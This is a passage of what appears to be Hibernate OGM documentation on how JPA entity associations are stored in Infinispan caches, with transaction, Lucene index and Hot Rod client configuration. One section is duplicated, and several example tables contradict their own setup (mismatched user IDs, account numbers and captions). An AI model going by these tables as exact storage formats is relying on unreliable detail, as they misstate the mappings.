ENTRIES\n\n.2+^.^| [\"vehicule_id\"], [\"V_01\"] | vehicule_id | \"V_01\"\n | diameter | 0.0\n|===\n====\n\n.Bidirectional one-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class Husband {\n\n @Id\n private String id;\n private String name;\n\n @OneToOne\n private Wife wife;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Wife {\n\n @Id\n private String id;\n private String name;\n\n @OneToOne(mappedBy=\"wife\")\n private Husband husband;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Husband` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.3+^.^| [\"id\"], [\"alex\"] | id | \"alex\"\n | name | \"Alex\"\n | wife | \"bea\"\n|===\n\n.Content of the `Wife` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"id\"], [\"bea\"] | id | \"bea\"\n | name | \"Bea\"\n|===\n\n.Content of the `associations_Husband` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.2+^.^| [\"wife\"], [\"bea\"]\n.2+^.^| [\"id\", \"wife\"], [\"alex\", \"bea\"]\n | id\n | \"alex\"\n\n | wife\n | \"bea\"\n|===\n====\n\n.Unidirectional one-to-many\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Basket` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"davide_basket\"] | id | \"davide_basket\"\n | owner | \"Davide\"\n|===\n\n.Content of the `Product` cache\n[cols=\"3*\", 
options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"name\"], [\"Beer\"] | name | \"Beer\"\n | description | \"Tactical Nuclear Penguin\"\n\n.2+^.^| [\"name\"], [\"Pretzel\"] | name | \"Pretzel\"\n | description | \"Glutino Pretzel Sticks\"\n|===\n\n.Content of the `associations_Basket_Product` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.4+^.^| [\"Basket_id\"], [\"davide_basket\"]\n.2+^.^| [\"Basket_id\", \"products_name\"], [\"davide_basket\", \"Beer\"]\n | Basket_id\n | \"davide_basket\"\n\n | products_name\n | \"Beer\"\n\n.2+^.^| [\"Basket_id\", \"products_name\"], [\"davide_basket\", \"Pretzel\"]\n | Basket_id\n | \"davide_basket\"\n\n | products_name\n | \"Pretzel\"\n\n\n|===\n====\n\n.Unidirectional one-to-many with `@JoinTable`\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n @JoinTable( name = \"BasketContent\" )\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Basket` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"davide_basket\"] | id | \"davide_basket\"\n | owner | \"Davide\"\n|===\n\n.Content of the `Basket` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"name\"], [\"Beer\"] | name | \"Beer\"\n | description | \"Tactical Nuclear Penguin\"\n\n.2+^.^| [\"name\"], [\"Pretzel\"] | name | \"Pretzel\"\n | description | \"Glutino Pretzel Sticks\"\n|===\n\n.Content of the `associations_BasketContent` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.4+^.^| [\"Basket_id\"], [\"davide_basket\"]\n.2+^.^| [\"Basket_id\", \"products_name\"], [\"davide_basket\", \"Beer\"]\n | Basket_id\n | \"davide_basket\"\n\n | products_name\n | \"Beer\"\n\n.2+^.^| [\"Basket_id\", \"products_name\"], [\"davide_basket\", \"Pretzel\"]\n | Basket_id\n | \"davide_basket\"\n\n | products_name\n | \"Pretzel\"\n|===\n====\n\n.Unidirectional one-to-many using maps with defaults\n====\n[source, JAVA]\n----\n@Entity\npublic class User {\n\n @Id\n private String id;\n\n @OneToMany\n private Map<String, Address> addresses = new HashMap<String, Address>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Address {\n\n @Id\n private String id;\n private String city;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `User` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n ^.^| [\"id\"], [\"user_001\"] | id | \"user_001\"\n|===\n\n.Content of the `Address` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"id\"], [\"address_001\"] | id | \"address_001\"\n | city | \"Rome\"\n\n.2+^.^| [\"id\"], [\"address_002\"] | id | \"address_002\"\n | city | \"Paris\"\n|===\n\n\n.Content of the `associations_User_address` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.6+^.^| [\"User_id\"], \"user_001\"]\n.3+^.^| [\"User_id\", \"addresses_KEY\"], [\"user_001\", \"home\"]\n | User_id\n | \"user_001\"\n\n | addresses_KEY\n | \"home\"\n\n | addresses_id\n | \"address_001\"\n\n\n.3+^.^| [\"User_id\", \"addresses_KEY\"], [\"user_001\", \"work\"]\n | User_id\n | \"user_002\"\n\n | addresses_KEY\n | \"work\"\n\n | addresses_id\n | 
\"address_002\"\n|===\n====\n\n.Unidirectional one-to-many using maps with @MapKeyColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class User {\n\n @Id\n private String id;\n\n @OneToMany\n @MapKeyColumn(name = \"addressType\")\n private Map<String, Address> addresses = new HashMap<String, Address>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Address {\n\n @Id\n private String id;\n private String city;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `User` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n ^.^| [\"id\"], [\"user_001\"] | id | \"user_001\"\n|===\n\n.Content of the `Address` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"id\"], [\"address_001\"] | id | \"address_001\"\n | city | \"Rome\"\n\n.2+^.^| [\"id\"], [\"address_002\"] | id | \"address_002\"\n | city | \"Paris\"\n|===\n\n.Content of the `associations_User_address` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.6+^.^| [\"User_id\"], \"user_001\"]\n.3+^.^| [\"User_id\", \"addressType\"], [\"user_001\", \"home\"]\n | User_id\n | \"user_001\"\n\n | addressesType\n | \"home\"\n\n | addresses_id\n | \"address_001\"\n\n\n.3+^.^| [\"User_id\", \"addressType\"], [\"user_001\", \"work\"]\n | User_id\n | \"user_002\"\n\n | addressesType\n | \"work\"\n\n | addresses_id\n | \"address_002\"\n|===\n====\n\n.Unidirectional many-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class JavaUserGroup {\n\n @Id\n private String jugId;\n private String name;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Member {\n\n @Id\n private String id;\n private String name;\n\n @ManyToOne\n private JavaUserGroup memberOf;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `JavaUserGroup` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"jugId\"], [\"summer_camp\"] | jugId | \"summer_camp\"\n | name | \"JUG Summer Camp\"\n|===\n\n.Content of the `Member` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.3+^.^| [\"member_id\"], [\"emmanuel\"] | member_id | \"emmanuel\"\n | name | \"Emmanuel Bernard\"\n | memberOf_jug_id | \"summer_camp\"\n\n.3+^.^| [\"member_id\"], [\"jerome\"] | member_id | \"jerome\"\n | name | \"Jerome\"\n | memberOf_jug_id | \"summer_camp\"\n|===\n====\n\n.Bidirectional many-to-one \n====\n[source, JAVA]\n----\n@Entity\npublic class SalesForce {\n\n @Id\n private String id;\n private String corporation;\n\n @OneToMany(mappedBy = \"salesForce\")\n private Set<SalesGuy> salesGuys = new HashSet<SalesGuy>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class SalesGuy {\n private String id;\n private String name;\n\n @ManyToOne\n private SalesForce salesForce;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `SalesForce` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"red_hat\"] | id | \"red_hat\"\n | corporation | \"Red Hat\"\n|===\n\n.Content of the `SalesGuy` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.3+^.^| [\"id\"], [\"eric\"] | id | \"eric\"\n | name | \"Eric\"\n | salesForce_id | \"red_hat\"\n\n.3+^.^| [\"id\"], [\"simon\"] | id | \"simon\"\n | name | \"Simon\"\n | salesForce_id | \"red_hat\"\n|===\n\n.Content of the `associations_SalesGuy` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.4+^.^| [\"salesForce_id\"], [\"red_hat\"]\n.2+^.^| [\"salesForce_id\", \"id\"], 
[\"red_hat\", \"eric\"]\n | salesForce_id\n | \"red_hat\"\n\n | id\n | \"eric\"\n\n.2+^.^| [\"salesForce_id\", \"id\"], [\"red_hat\", \"simon\"]\n | salesForce_id\n | \"red_hat\"\n\n | id\n | \"simon\"\n|===\n====\n\n.Unidirectional many-to-many\n====\n[source, JAVA]\n----\n@Entity\npublic class Student {\n\n @Id\n private String id;\n private String name;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class ClassRoom {\n\n @Id\n private long id;\n private String lesson;\n\n @ManyToMany\n private List<Student> students = new ArrayList<Student>();\n\n \/\/ getters, setters ...\n}\n----\n\nThe \"Math\" class has 2 students: John Doe and Mario Rossi\n\nThe \"English\" class has 2 students: Kate Doe and Mario Rossi\n\n.Content of the `ClassRoom` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [1] | id | 1 \n | name | \"Math\"\n\n.2+^.^| [\"id\"], [2] | id | 2 \n | name | \"English\"\n|===\n\n.Content of the `Student` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"id\"], [\"john\"] | id | \"john\"\n | name | \"John Doe\"\n\n.2+^.^| [\"id\"], [\"mario\"] | id | \"mario\"\n | name | \"Mario Rossi\"\n\n.2+^.^| [\"id\"], [\"kate\"] | id | \"kate\"\n | name | \"Kate Doe\"\n|===\n\n.Content of the `associations_ClassRoom_Student` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.4+^.^| [\"ClassRoom_id\"], [1]\n.2+^.^| [\"ClassRoom_id\", \"students_id\"], [1, \"mario\"]\n | ClassRoom_id\n | 1 \n\n | students_id\n | \"mario\"\n\n.2+^.^| [\"ClassRoom_id\", \"students_id\"], [1, \"john\"]\n | ClassRoom_id\n | 1 \n\n | students_id\n | \"john\"\n\n.4+^.^| [\"ClassRoom_id\"], [2]\n.2+^.^| [\"ClassRoom_id\", \"students_id\"], [2, \"kate\"]\n | ClassRoom_id\n | 2 \n\n | students_id\n | \"kate\"\n\n.2+^.^| [\"ClassRoom_id\", \"students_id\"], [2, \"mario\"]\n | ClassRoom_id\n | 2 \n\n | students_id\n | \"mario\"\n|===\n====\n\n.Bidirectional many-to-many \n====\n[source, JAVA]\n----\n@Entity\npublic class AccountOwner {\n\n @Id\n private String id;\n\n private String SSN;\n\n @ManyToMany\n private Set<BankAccount> bankAccounts;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class BankAccount {\n\n @Id\n private String id;\n\n private String accountNumber;\n\n @ManyToMany( mappedBy = \"bankAccounts\" )\n private Set<AccountOwner> owners = new HashSet<AccountOwner>();\n\n \/\/ getters, setters ...\n}\n----\n\nDavid owns 2 accounts: \"012345\" and \"ZZZ-009\"\n\n.Content of the `AccountOwner` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"David\"] | id | \"David\"\n | SSN | \"0123456\"\n|===\n\n.Content of the `BankAccount` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"id\"], [\"account_1\"] | id | \"account_1\"\n | accountNumber | \"X2345000\"\n\n.2+^.^| [\"id\"], [\"account_2\"] | id | \"account_2\"\n | accountNumber | \"ZZZ-009\"\n|===\n\n.Content of the `AccountOwner_BankAccount` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.2+^.^| [\"bankAccounts_id\"], [\"account_1\"]\n.2+^.^| [\"bankAccounts_id\", \"owners_id\"], [\"account_1\", \"David\"]\n | bankAccounts_id\n | \"account_1\"\n\n | owners_id\n | \"David\"\n\n.2+^.^| [\"bankAccounts_id\"], [\"account_2\"]\n.2+^.^| [\"bankAccounts_id\", \"owners_id\"], [\"account_2\", \"David\"]\n | bankAccounts_id\n | \"account_2\"\n\n | owners_id\n | \"David\"\n\n.4+^.^| [\"owners_id\"], 
[\"David\"]\n.2+^.^| [\"owners_id\", \"banksAccounts_id\"], [\"David\", \"account_1\"]\n | bankAccounts_id\n | \"account_1\"\n\n | owners_id\n | \"David\"\n\n.2+^.^| [\"owners_id\", \"banksAccounts_id\"], [\"David\", \"account_2\"]\n | bankAccounts_id\n | \"account_2\"\n\n | owners_id\n | \"David\"\n\n|===\n====\n\n[[ogm-infinispan-transactions]]\n\n==== Transactions\n\nInfinispan supports transactions and integrates with any standard JTA `TransactionManager`;\nthis is a great advantage for JPA users as it allows to experience a _similar_ behaviour\nto the one we are used to when we work with RDBMS databases.\n\nThis capability is only available to Infinispan Embedded users: the transactional integration\ncapabilities are not exposed to the Hot Rod clients.\n\nIf you're having Hibernate OGM start and manage Infinispan,\nyou can skip this as it will inject the same `TransactionManager` instance\nwhich you already have set up in the Hibernate \/ JPA configuration.\n\nIf you are providing an already started Infinispan CacheManager instance\nby using the [acronym]`JNDI` lookup approach,\nthen you have to make sure the CacheManager is using the same `TransactionManager`\nas Hibernate:\n\n.Configuring a JBoss Standalone TransactionManager lookup in Infinispan configuration\n====\n[source, XML]\n----\n<default>\n <transaction\n transactionMode=\"TRANSACTIONAL\"\n transactionManagerLookupClass=\n \"org.infinispan.transaction.lookup.JBossStandaloneJTAManagerLookup\" \/>\n<\/default>\n----\n====\n\nInfinispan supports different transaction modes like `PESSIMISTIC` and `OPTIMISTIC`,\nsupports [acronym]`XA` recovery and provides many more configuration options;\nsee the http:\/\/infinispan.org\/documentation\/[Infinispan User Guide]\nfor more advanced configuration options.\n\n[[ogm-infinispan-indexstorage]]\n\n==== Storing a Lucene index in Infinispan\n\nHibernate Search, which can be used for advanced query capabilities (see <<ogm-query>>),\nneeds some place to store the indexes for its embedded `Apache Lucene` engine.\n\nA common place to store these indexes is the filesystem\nwhich is the default for Hibernate Search;\nhowever if your goal is to scale your NoSQL engine on multiple nodes\nyou need to share this index.\nNetwork sharing file systems are a possibility but we don't recommended that.\nOften the best option is to store the index\nin whatever NoSQL database you are using (or a different dedicated one).\n\n[TIP]\n====\nYou might find this section useful even if you don't intend to store your data in Infinispan.\n====\n\nThe Infinispan project provides an adaptor to plug into Apache Lucene,\nso that it writes the indexes in Infinispan and searches data in it.\nSince Infinispan can be used as an application cache to other NoSQL storage engines\nby using a CacheStore (see <<ogm-infinispan-storage>>)\nyou can use this adaptor to store the Lucene indexes\nin any NoSQL store supported by Infinispan:\n\n* JDBC databases\n* Cassandra\n* Filesystem (but locked correctly at the Infinispan level)\n* MongoDB\n* HBase\n* LevelDB\n* A secondary (independent) Infinispan grid\n\n\nHow to configure it? 
[[ogm-infinispan-indexstorage]]\n\n==== Storing a Lucene index in Infinispan\n\nHibernate Search, which can be used for advanced query capabilities (see <<ogm-query>>),\nneeds some place to store the indexes for its embedded `Apache Lucene` engine.\n\nA common place to store these indexes is the filesystem,\nwhich is the default for Hibernate Search;\nhowever if your goal is to scale your NoSQL engine on multiple nodes\nyou need to share this index.\nNetwork-shared file systems are a possibility, but we don't recommend that.\nOften the best option is to store the index\nin whatever NoSQL database you are using (or a different dedicated one).\n\n[TIP]\n====\nYou might find this section useful even if you don't intend to store your data in Infinispan.\n====\n\nThe Infinispan project provides an adaptor to plug into Apache Lucene,\nso that it writes the indexes to Infinispan and searches data in it.\nSince Infinispan can be used as an application cache to other NoSQL storage engines\nby using a CacheStore (see <<ogm-infinispan-storage>>),\nyou can use this adaptor to store the Lucene indexes\nin any NoSQL store supported by Infinispan:\n\n* JDBC databases\n* Cassandra\n* Filesystem (but locked correctly at the Infinispan level)\n* MongoDB\n* HBase\n* LevelDB\n* A secondary (independent) Infinispan grid\n\n\nHow to configure it? Here is a simple cheat sheet to get you started with this type of setup:\n\n* Add `org.infinispan:infinispan-directory-provider:{infinispanVersion}` to your dependencies\n* Set these configuration properties:\n\n** `hibernate.search.default.directory_provider = infinispan`\n** `hibernate.search.default.exclusive_index_use = false`\n** `hibernate.search.infinispan.configuration_resourcename =` [infinispan configuration filename]\n\nThis configuration is simple and will work fine in most scenarios, but keep in mind that disabling\n`exclusive_index_use` will be neither fast nor scalable.\nFor high performance, high concurrency or production use please refer to the\nhttp:\/\/infinispan.org\/documentation\/[Infinispan documentation] for more advanced configuration options and tuning.\n\nThe referenced Infinispan configuration should define a `CacheStore`\nto load\/store the index in the NoSQL engine of choice.\nIt should also define three cache names:\n\n.Infinispan caches used to store indexes\n[cols=\"1,2,1\", options=\"header\"]\n|===============\n|Cache name|Description|Suggested cluster mode\n|LuceneIndexesLocking|Transfers locking information. Does not need a cache\n store.|replication\n|LuceneIndexesData|Contains the bulk of Lucene data. Needs a cache\n store.|distribution + L1\n|LuceneIndexesMetadata|Stores metadata on the index segments. Needs a cache\n store.|replication\n|===============\n\nThis configuration is not going to scale well on write operations:\nto do that you should read about the master\/slave and sharding options in Hibernate Search.\nThe complete explanation and configuration options can be found in the\nhttps:\/\/docs.jboss.org\/hibernate\/search\/{hibernate-search-major-minor-version}\/reference\/en-US\/html_single\/#infinispan-directories[Hibernate Search Reference Guide].\n\nSome NoSQL engines support storing Lucene indexes directly,\nin which case you might skip the Infinispan Lucene integration\nby implementing a custom `DirectoryProvider` for Hibernate Search.\nYou're very welcome to share the code\nand have it merged in Hibernate Search for others to use, inspect, improve and maintain.\n\n[[ogm-infinispan-remote]]\n\n=== Hibernate OGM & Infinispan Server over Hot Rod\n\nIn this section we'll see how to configure Hibernate OGM to connect to\n\"Infinispan Server using the Hot Rod protocol\", which we will call \"Infinispan Remote\"\nfor brevity and to differentiate it from \"Infinispan Embedded\".\n\nIn this mode Hibernate OGM cannot bootstrap or otherwise control the lifecycle\nof Infinispan, so we will assume that you already have a cluster of Infinispan Server\nnodes running.\nFor instructions on setting one up, see the http:\/\/infinispan.org\/docs\/stable\/server_guide\/server_guide.html[Infinispan Server Guide].\n\nThe good news is that - since it's a separate service - there won't be much to configure\nin Hibernate OGM.\n\n[CAUTION]\n====\nThe Hibernate OGM support for Infinispan Remote is considered experimental.\nIn particular, the storage format is not set in stone.\n====\n\n==== Adding Infinispan Remote dependencies\n\nTo use Hibernate OGM to connect to an Infinispan Server using the Hot Rod protocol, you will need the following extension\nand its transitive dependencies (which include, among others, the Hot Rod client):\n\n[source, XML]\n[subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.hibernate.ogm<\/groupId>\n <artifactId>hibernate-ogm-infinispan-remote<\/artifactId>\n <version>{hibernate-ogm-version}<\/version>\n<\/dependency>\n----\n\n
<version>{hibernate-ogm-version}<\/version>\n<\/dependency>\n----\n\n==== Configuration properties for Infinispan Remote\n\nFirst, let Hibernate know that you want to use the OGM Infinispan Remote datastore by setting the\n`hibernate.ogm.datastore.provider` property to `infinispan_remote`.\n\nThe next step is to configure the Hot Rod client.\nYou have two options:\n\n* either provide a resource file containing all Hot Rod client configuration properties\n* or include all the Hot Rod client configuration properties with a custom prefix, as explained below.\n\nTo use an external configuration resource, set the `hibernate.ogm.infinispan_remote.configuration_resource_name`\nconfiguration property to the resource name.\n\n.Using a separate resource to configure the Hot Rod client\n====\n[source, XML]\n----\n<?xml version=\"1.0\"?>\n<persistence xmlns=\"http:\/\/java.sun.com\/xml\/ns\/persistence\"\n\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/persistence http:\/\/java.sun.com\/xml\/ns\/persistence\/persistence_2_0.xsd\"\n\tversion=\"2.0\">\n\n\t<persistence-unit name=\"ogm-with-hotrod\">\n\t\t<provider>org.hibernate.ogm.jpa.HibernateOgmPersistence<\/provider> # <1>\n\t\t<properties>\n\t\t\t<property name=\"hibernate.ogm.datastore.provider\"\n\t\t\t\tvalue=\"infinispan_remote\" \/> # <2>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.configuration_resource_name\"\n\t\t\t\tvalue=\"hotrodclient.properties\" \/> # <3>\n\t\t<\/properties>\n\t<\/persistence-unit>\n<\/persistence>\n----\n<1> Choose Hibernate OGM as JPA Provider\n<2> pick `infinispan_remote` as datastore\n<3> point to the Hot Rod configuration file\n\n[source]\n----\ninfinispan.client.hotrod.server_list = 127.0.0.1:11222\ninfinispan.client.hotrod.tcp_no_delay = true\ninfinispan.client.hotrod.tcp_keep_alive = false\n\n## below is connection pooling config\nmaxActive=-1\nmaxTotal = -1\nmaxIdle = -1\nwhenExhaustedAction = 1\ntimeBetweenEvictionRunsMillis = 120000\nminEvictableIdleTimeMillis = 300000\ntestWhileIdle = true\nminIdle = 1\n----\n====\n\nAlternatively, you can embed the Hot Rod properties in your Hibernate (or JPA) configuration\nfile, but you'll have to replace the `infinispan.client.hotrod.` prefix with the custom\nprefix `hibernate.ogm.infinispan_remote.client.`.\n\nSome of the Hot Rod client configuration properties don't normally use a prefix - specifically\nall properties relating to connection pooling as in the previous example - these will also\nneed to use the `hibernate.ogm.infinispan_remote.client.` prefix.\n\nProperties set with the `hibernate.ogm.infinispan_remote.client.` prefix will override the same\nproperties configured using an external resource file.\n\n.Embedding the Hot Rod client configuration properties in the Hibernate configuration\n====\n[source, XML]\n----\n<?xml version=\"1.0\"?>\n<persistence xmlns=\"http:\/\/java.sun.com\/xml\/ns\/persistence\"\n\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/persistence http:\/\/java.sun.com\/xml\/ns\/persistence\/persistence_2_0.xsd\"\n\tversion=\"2.0\">\n\n\t<persistence-unit name=\"ogm-with-hotrod\">\n\t\t<provider>org.hibernate.ogm.jpa.HibernateOgmPersistence<\/provider> # <1>\n\t\t<properties>\n\t\t\t<property name=\"hibernate.ogm.datastore.provider\"\n\t\t\t\tvalue=\"infinispan_remote\" \/> # <2>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.server_list\"\n\t\t\t\tvalue=\"127.0.0.1:11222\" 
\/> # <3>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.tcp_no_delay\"\n\t\t\t\tvalue=\"true\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.tcp_keep_alive\"\n\t\t\t\tvalue=\"false\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.maxActive\"\n\t\t\t\tvalue=\"-1\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.maxTotal\"\n\t\t\t\tvalue=\"-1\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.maxIdle\"\n\t\t\t\tvalue=\"-1\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.whenExhaustedAction\"\n\t\t\t\tvalue=\"1\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.timeBetweenEvictionRunsMillis\"\n\t\t\t\tvalue=\"120000\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.minEvictableIdleTimeMillis\"\n\t\t\t\tvalue=\"300000\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.testWhileIdle\"\n\t\t\t\tvalue=\"true\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.minIdle\"\n\t\t\t\tvalue=\"1\" \/>\n\t\t<\/properties>\n\t<\/persistence-unit>\n<\/persistence>\n----\n<1> Choose Hibernate OGM as JPA Provider\n<2> pick `infinispan_remote` as datastore\n<3> include Hot Rod configuration properties, just replacing\/adding the OGM prefix.\n====\n\nBelow are a couple more advanced properties which might be of interest.\n\nhibernate.ogm.infinispan_remote.schema_capture_service::\nIf you set this to an implementation of `org.hibernate.ogm.datastore.infinispanremote.schema.spi.SchemaCapture` you\ncan collect any generated Protobuf Schema. This could be useful for integrations with other tools.\nYou can either provide the fully qualified classname of a `SchemaCapture` implementation, or pass an instance of a `SchemaCapture`\nin the configuration properties, if you're booting Hibernate programmatically.
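\n+\nAs an illustrative sketch only - `MySchemaCapture` is a hypothetical class implementing the `SchemaCapture` SPI (check the SPI javadoc for the exact callback to implement) - an instance could be passed when booting via JPA like this:\n+\n[source, JAVA]\n----\nimport java.util.HashMap;\nimport java.util.Map;\n\nimport javax.persistence.EntityManagerFactory;\nimport javax.persistence.Persistence;\n\n\/\/ 'MySchemaCapture' stands in for any implementation of the SchemaCapture SPI\nMap<String, Object> settings = new HashMap<>();\nsettings.put(\"hibernate.ogm.infinispan_remote.schema_capture_service\", new MySchemaCapture());\n\n\/\/ Reuses the persistence unit name from the examples above\nEntityManagerFactory emf = Persistence.createEntityManagerFactory(\"ogm-with-hotrod\", settings);\n----\n\nhibernate.ogm.infinispan_remote.schema_package_name::\nDefines the package name of the generated Protobuf schema. 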
Defaults to `HibernateOGMGenerated`.\nUseful to isolate different applications using the same Infinispan Server instance.\n\n\n==== Data encoding: Protobuf Schema\n\nWhen using the _Infinispan Remote_ backend, your data will be encoded using Protocol Buffers,\nalso known as Protobuf.\n\n> Protocol Buffers are a language-neutral, platform-neutral\n> extensible mechanism for serializing structured data\n> -- https:\/\/developers.google.com\/protocol-buffers\/\n\nThis encoding strategy will be used both during _transmission_ to and from the datagrid, and\nas a _storage format_ on the Infinispan Server.\n\nTypical usage of Google's developer tools for Java would require you to download the `protoc`\ncompiler to generate Java stubs; you won't need that when using Hibernate OGM as the backend\nwill generate the encoding and decoding functions on the fly from your entities.\n\nHaving Hibernate OGM generate the schema for you makes it easier to get\nstarted, but there's a drawback: you are not directly in control of the protobuf schema.\nHibernate OGM will deploy this schema - or expect a compatible schema to be deployed - as it will use\nits generated codecs to read and write data to the Infinispan Server.\n\nThe protobuf technology is designed to allow evolution of your schema: you can deploy a\ndifferent schema on the Infinispan Server than the one OGM expects, but this is an advanced\ntopic and you'll have to make sure the deployed schema is compatible with the one OGM is\ngenerating and using.\n\nAnother reason to make sure the deployed protobuf schema is a _compatible evolution_ of\na previous schema is to make sure you can still read data which is already stored in\nthe datagrid.\n\n[IMPORTANT]\n====\nRemember that the Protobuf schema is used both during _transmission_ and _storage_.\nThe fact that it's used also during _transmission_ of your data is a key difference from the\nschema of a SQL database.\n\nFor example, even if a property \"A\" is not nullable in terms of storage, you will still\nwant it to be flagged as `optional` in a protobuf schema to allow, for example, retrieving\na subset of data properties without having to always retrieve the property \"A\".\n====\n\nYou don't need to do anything regarding the schema: Hibernate OGM will automatically\ndeploy it to the Infinispan datagrid at bootstrap of Hibernate.\nYou might want to keep this in mind though, both to be able to evolve your schema\nwithout data loss, and to be able to generate decoders for other Infinispan clients not\nusing Hibernate OGM.\n\nThe deployed schemas can be fetched from the Infinispan Server; Hibernate OGM also\nlogs the generated schemas at `INFO` level in the logging category\n`org.hibernate.ogm.datastore.infinispanremote.impl.protobuf.SchemaDefinitions`.\n\n==== Storage Principles of the Infinispan Remote dataprovider\n\nThis is actually very simple.\n\nImagine you were mapping your entities to a traditional, table based [acronym]`RDBMS`;\nnow instead of tables, you have caches.\n
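\nPurely as an illustration - this is not part of the Hibernate OGM API, and the cache name and key below are hypothetical - reading one of these caches with the plain Hot Rod client looks like this:\n\n====\n[source, JAVA]\n----\nimport org.infinispan.client.hotrod.RemoteCache;\nimport org.infinispan.client.hotrod.RemoteCacheManager;\n\n\/\/ Connects using the Hot Rod client configuration found on the classpath\nRemoteCacheManager manager = new RemoteCacheManager();\n\n\/\/ One named cache plays the role of one \"table\"\nRemoteCache<Object, Object> cache = manager.getCache(\"Book\");\n\n\/\/ A get() by key replaces a primary-key lookup; 'bookKey' is a\n\/\/ hypothetical, dialect-encoded key object\nObject value = cache.get(bookKey);\n----\n====\n\n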
